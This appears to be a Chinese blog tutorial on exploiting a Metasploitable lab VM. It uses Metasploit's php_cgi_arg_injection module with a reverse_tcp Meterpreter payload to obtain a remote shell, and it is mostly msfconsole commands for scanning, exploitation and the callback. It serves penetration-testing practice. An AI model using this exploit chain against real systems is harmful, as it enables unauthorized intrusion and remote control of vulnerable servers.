Ps.你只需要打开浏览器输入[Metasploitable IP地址]/phpinfo.php就可以了.
透过扫描得到phpinfo, 我就两个步骤带过.
1.扫描目标是否打开了80端口
2.打开Metasploit # msfconsole
使用Payload > use auxiliary/scanner/http/http_version
查看配置 > show options
设定你的目标IP地址 > set RHOSTS 192.168.1.166
开始检查 > run
看到你的php版本信息
信息足够后让我们开始渗透
3. 重新打开你的Metasploit # msfconsole
这里教大家一个指令当输入到一半忘记了后半段的指令可以使用tab + tab找出后半部有可能的指令.
调用Paylaod > use exploit/multi/http/php_cgi_arg_injection
4.查看配置文件 > show options
设定目标IP地址 > set RHOSTS [Metasploitable IP地址]
5.这里就要比较留意一点因为我们再加载多一个Payload.
加载Tcp反弹Payload > set payload php/meterpreter/reverse_tcp
查看配置 > show options
6.设定Tcp反弹回来的地址这里要填写自己的IP地址可以使用#ifconfig查看如果你是使用网卡就是wlan0的IP地址
设定你自己的IP地址>set LHOST [自己的IP地址]
7.攻击 > exploit
显示得到了session 1 opened 成功反弹了Meterpreter的shell.
8.使用指令确认是不是Meterpreter shell. GET
查看系统信息 > sysinfo
退出也是输入: exit指令就可以了.
感谢阅读
No comments:
Post a Comment